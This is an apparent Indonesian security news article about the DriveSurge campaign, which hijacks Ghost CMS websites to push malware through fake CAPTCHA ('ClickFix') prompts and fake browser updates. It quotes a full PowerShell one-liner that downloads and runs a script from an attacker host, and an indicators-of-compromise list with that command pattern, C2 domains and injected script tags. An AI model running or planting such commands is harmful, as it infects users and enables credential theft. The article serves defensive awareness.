Lewati ke konten utama
SERAPHIM NEWS
▲ KRITIS

ClickFix & FakeUpdate: Ribuan Website Sah Dibajak untuk Sebarkan Malware Lewat PowerShell dan Update Palsu

12 Juli 2026 Seraphim News 11 mnt baca
ClickFix & FakeUpdate: Ribuan Website Sah Dibajak untuk Sebarkan Malware Lewat PowerShell dan Update Palsu

“Website yang Anda percayai hari ini bisa jadi perangkap malware besok — tanpa sepengetahuan pemiliknya sekalipun.”


Ringkasan

Kelompok threat actor DriveSurge telah meluncurkan kampanye distribusi malware berskala massal dengan membajak ribuan website sah — termasuk situs institusi pendidikan, organisasi teknologi, dan portal bisnis — untuk menyebarkan malware melalui dua teknik social engineering yang sangat efektif: ClickFix dan FakeUpdate.

Kampanye ini mengeksploitasi kerentanan SQL injection pada Ghost CMS (CVE-2026-26980) untuk menyusup dan menyuntikkan kode malicious ke dalam halaman website korban. Setiap pengunjung yang tidak curiga berpotensi menjadi korban berikutnya.


Apa Itu ClickFix dan FakeUpdate?

ClickFix

ClickFix adalah teknik social engineering di mana pengguna disuguhkan dialog “CAPTCHA verifikasi” atau “Cloudflare check” palsu yang tampak resmi. Dialog ini menginstruksikan pengguna untuk:

  1. Menekan kombinasi tombol Win + R
  2. Menekan Ctrl + V (paste)
  3. Menekan Enter

Tanpa disadari, pengguna baru saja menjalankan perintah PowerShell malicious yang sudah di-copy ke clipboard mereka secara otomatis oleh JavaScript di halaman web.

FakeUpdate

FakeUpdate menampilkan notifikasi update browser palsu (Chrome, Firefox, Safari, Edge) yang sangat meyakinkan. Saat pengguna mengklik “Update”, mereka mengunduh malware yang menyamar sebagai installer browser resmi.


Siapa di Balik Serangan: DriveSurge

DriveSurge adalah threat actor yang beroperasi sebagai Initial Access Broker (IAB) dengan model bisnis Pay-Per-Install (PPI):

┌────────────────────────────────────────┐
│           DRIVESURGE PPI MODEL          │
│                                         │
│  1. BOBOL WEBSITE SAH                   │
│       ▼                                 │
│  2. SUNTIKKAN MALICIOUS JAVASCRIPT      │
│       ▼                                 │
│  3. PENGUNJUNG TERKENA MALWARE          │
│       ▼                                 │
│  4. TERIMA BAYARAN PER INSTALL          │
│       ▼                                 │
│  5. UANG MENGALIR, KORBAN BERTAMBAH     │
└────────────────────────────────────────┘

DriveSurge menggunakan zTDS (Traffic Distribution System) untuk memprofilkan setiap pengunjung website dan menyajikan lure (umpan) yang paling efektif berdasarkan:

  • Sistem operasi (Windows, macOS)
  • Browser yang digunakan
  • Geolokasi IP
  • Perilaku browsing sebelumnya

Bagaimana Website Sah Dibajak

Vektor Utama: Ghost CMS SQL Injection

DriveSurge mengeksploitasi CVE-2026-26980, sebuah kerentanan SQL injection kritis pada Ghost CMS — platform content management system open-source yang populer di kalangan publisher, developer, dan organisasi teknologi.

Proses pembajakan:

┌─────────────────────────────────────┐
│ 1. SCAN Ghost CMS di internet       │
│    (fingerprint versi)              │
└───────────────┬─────────────────────┘
                ▼
┌─────────────────────────────────────┐
│ 2. EKSPLOITASI SQL INJECTION        │
│    CVE-2026-26980                   │
└───────────────┬─────────────────────┘
                ▼
┌─────────────────────────────────────┐
│ 3. CURIAN API KEY & CREDENTIALS     │
│    Ghost Admin API                  │
└───────────────┬─────────────────────┘
                ▼
┌─────────────────────────────────────┐
│ 4. SUNTIKKAN MALICIOUS JS           │
│    ke dalam <head> semua halaman    │
└───────────────┬─────────────────────┘
                ▼
┌─────────────────────────────────────┐
│ 5. SETIAP PENGUNJUNG = TARGET       │
│    POTENSIAL                        │
└─────────────────────────────────────┘

Yang membuat serangan ini sangat berbahaya: pemilik website seringkali tidak menyadari bahwa situs mereka telah dikompromikan — tidak ada defacement, tidak ada perubahan konten yang kasat mata. Yang berubah hanyalah tambahan beberapa baris kode JavaScript yang memuat script eksternal dari server attacker.


Anatomi Serangan ClickFix

Langkah Demi Langkah

Saat korban mengunjungi website yang terinfeksi:

1. Dialog verifikasi muncul:

┌──────────────────────────────────────┐
│  [Cloudflare Verification]           │
│                                      │
│  Please verify you are human         │
│                                      │
│  Press: Win + R                      │
│  Then:   Ctrl + V                    │
│  Then:   Enter                       │
│                                      │
│  [ Verification Code copied ]        │
│                                      │
│      [ I am human ]                  │
└──────────────────────────────────────┘

2. Clipboard otomatis terisi:

powershell -ep bypass -w hidden -c "IEX (iwr 'https://cdn-delivery[.]net/update.ps1' -UseBasicParsing).Content"

3. Korban menjalankan perintah — PowerShell mengeksekusi script dari server attacker:

  • Download dan jalankan malware payload
  • Establish persistence di sistem
  • Mulai eksfiltrasi data atau download modul tambahan

Mengapa Ini Efektif?

  • Memanfaatkan kepercayaan — website yang dibajak adalah website sah yang dikenal korban
  • CAPTCHA adalah hal normal — pengguna sudah terbiasa melakukan verifikasi “I am human”
  • Tidak perlu download file — melewati deteksi antivirus berbasis file scanning
  • PowerShell adalah tool sah — sulit dibedakan dari aktivitas normal

Anatomi Serangan FakeUpdate

Pola Serangan

Pengunjung website terinfeksi akan melihat halaman yang meniru:

  • Google Chrome update page — lengkap dengan logo, warna, dan tipografi identik
  • Firefox emergency update — dengan nada urgensi “Critical Security Fix”
  • Safari extension update — khusus menargetkan pengguna macOS
┌──────────────────────────────────────┐
│  Google Chrome                        │
│                                      │
│  Critical Security Update            │
│  Version 127.0.6533.89               │
│                                      │
│  A critical security vulnerability   │
│  has been detected in your browser.  │
│                                      │
│  Please update immediately.          │
│                                      │
│  [ Download Update ]                 │
└──────────────────────────────────────┘

File yang diunduh biasanya berupa:

  • Chrome.Update.Installer.exe
  • Firefox.Security.Patch.dmg
  • Safari.Update.pkg

Target macOS

DriveSurge juga mengembangkan payload khusus untuk macOS:

  • Clipboard hijacking — JavaScript payload yang secara diam-diam mengganti konten clipboard
  • DMG installer palsu — meniru installer aplikasi macOS populer
  • Terminal command injection — instruksi yang tampak seperti troubleshooting teknis

CVE-2026-26980: Ghost CMS SQL Injection

Kerentanan ini adalah titik masuk utama yang digunakan DriveSurge:

Detail Informasi
CVE ID CVE-2026-26980
Jenis SQL Injection
Platform Ghost CMS
Dampak Pencurian API key, akses admin, injeksi konten
Status Aktif dieksploitasi massal

Kerentanan ini memungkinkan attacker yang tidak terautentikasi untuk:

  • Mengeksekusi query SQL arbitrer
  • Mengekstrak API key administrator
  • Mengakses Ghost Admin API dengan hak penuh
  • Menyuntikkan kode JavaScript ke template dan konten website

Skala dan Dampak

Metrik Angka
Website terdampak Ribuan (termasuk 700+ institusi pendidikan & teknologi)
Sektor terdampak Pendidikan, Teknologi, Bisnis, Media, Non-profit
Teknik distribusi zTDS (Traffic Distribution System)
Model bisnis Pay-Per-Install (PPI)

Dampak terhadap korban:

  • Pencurian kredensial — password browser, session token, cookie
  • Infeksi ransomware — payload sekunder sering berupa ransomware
  • Infostealer deployment — Vidar, RedLine, dan varian lainnya
  • Akses persistence — backdoor untuk akses jangka panjang

Dampak terhadap pemilik website:

  • Kerusakan reputasi — pengunjung yang menjadi korban akan kehilangan kepercayaan
  • Blacklist Google Safe Browsing — website ditandai sebagai berbahaya
  • Penurunan traffic & SEO — dampak langsung pada bisnis
  • Potensi tuntutan hukum — terutama jika data pengunjung terekspos

Indicators of Compromise

# Domain C2 Terkait DriveSurge
cdn-delivery[.]net
cloud-verify[.]com
browser-update[.]org
security-check[.]live

# Pola PowerShell
powershell -ep bypass -w hidden -c "IEX (iwr
powershell -ExecutionPolicy Bypass -WindowStyle Hidden

# JavaScript Injection Pattern
<script src="https://cdn-delivery[.]net/analytics.js">
<script src="https://cloud-verify[.]com/check.js">

# File Payload
Chrome.Update.Installer.exe
Firefox-Security-Patch.dmg

Cara Melindungi Diri

Untuk Pengguna

  1. JANGAN PERNAH menjalankan perintah dari website — tidak ada website sah yang meminta Anda membuka Run dialog dan paste perintah
  2. Update browser hanya dari menu internal — Settings → About Chrome/Firefox/Safari, bukan dari popup halaman web
  3. Waspada popup “urgent” — tone mendesak adalah taktik manipulasi klasik
  4. Install browser security extension — seperti Malwarebytes Browser Guard atau uBlock Origin
  5. Verifikasi URL — pastikan Anda benar-benar berada di halaman yang Anda tuju
  6. Nonaktifkan JavaScript untuk situs tidak dikenal — gunakan NoScript atau fitur serupa

Untuk Pemilik Website

  1. Update Ghost CMS ke versi terbaru — segera patch CVE-2026-26980
  2. Audit file website secara berkala — cari injeksi script yang tidak dikenal
  3. Pantau perubahan file — gunakan file integrity monitoring (FIM)
  4. Implementasikan CSP (Content Security Policy) — batasi sumber script yang boleh dimuat
  5. Gunakan Web Application Firewall (WAF) — blokir upaya injeksi SQL
  6. Rotasi API key secara berkala — batasi dampak jika key bocor

Kesimpulan

Kampanye ClickFix dan FakeUpdate yang dijalankan oleh DriveSurge adalah pengingat bahwa kepercayaan terhadap website bukanlah jaminan keamanan. Website yang Anda kunjungi hari ini — termasuk portal berita, blog teknologi, atau situs universitas — bisa saja sudah dikompromikan dan digunakan sebagai platform distribusi malware.

Bagi pemilik website, pelajaran utamanya adalah: menjaga website tetap aman bukan hanya tentang melindungi diri sendiri, tapi juga melindungi setiap pengunjung yang mempercayai Anda.

Aturan emas: Jika sebuah website meminta Anda menekan Win + R dan Ctrl + V, tutup browser Anda — Anda baru saja selamat dari serangan malware.


Artikel ini disusun berdasarkan analisis dari BleepingComputer, Malwarebytes, dan laporan threat intelligence terkait DriveSurge per Juni-Juli 2026.

Recommended Intelligence Reading